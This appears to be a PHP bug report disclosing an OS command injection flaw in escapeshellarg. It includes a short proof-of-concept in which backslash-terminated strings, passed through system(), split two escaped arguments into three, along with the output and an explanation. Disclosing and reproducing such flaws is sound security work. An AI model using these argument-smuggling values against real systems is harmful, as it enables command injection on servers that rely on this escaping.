Description:
------------
In following is the report from Takayuki Uchiyama.
This issue is an OS command injection vulnerability.
Do you have a specific case that fails?
I have attached the proof-of-concept code to reproduce this issue.
----------------------------------------------------------------------
PoC Code
----------------------------------------------------------------------
[poc.php]
------------------
$a = 'a\\';
$b = 'b -c d\\';
var_dump( $a, escapeshellarg($a) );
var_dump( $b, escapeshellarg($b) );
system( 'php arginfo.php ' . escapeshellarg($a) . ' ' . escapeshellarg($b) )
?>
------------------
[arginfo.php]
------------------
print( "--- ARG INFO ---\n" );
var_dump( $argv );
?>
------------------
----------------------------------------------------------------------
PoC Code
----------------------------------------------------------------------
After running 'php poc.php', if you get the following output, that version
of PHP is still vulnerable.
----------------------------------------------------------------------
Output
----------------------------------------------------------------------
string(2) "a\"
string(4) ""a\""
string(7) "b -c d\"
string(9) ""b -c d\""
--- ARG INFO ---
array(4) {
[0]=>
string(11) "arginfo.php"
[1]=>
string(4) "a" b"
[2]=>
string(2) "-c"
[3]=>
string(2) "d""
}
[Comment]
The first 4 lines are the output from the var_dump function in
poc.php. By comparing this output with the 4-5th lines of poc.php,
the output from the escapeshellarg function, it can be seen that
an attacker can set a single string that is not "" escaped as a
parameter.
Similarly, the 10 lines that follow --- ARG INFO --- command line
arguments when arginfo.php is called, which are output by the var_dump
function in arginfo.php. When comparing this to the way the system
function is called (with 2 parameters) in poc.php, it can be seen that
command line interprets is as 3 paramaters.
----------------------------------------------------------------------
Output
----------------------------------------------------------------------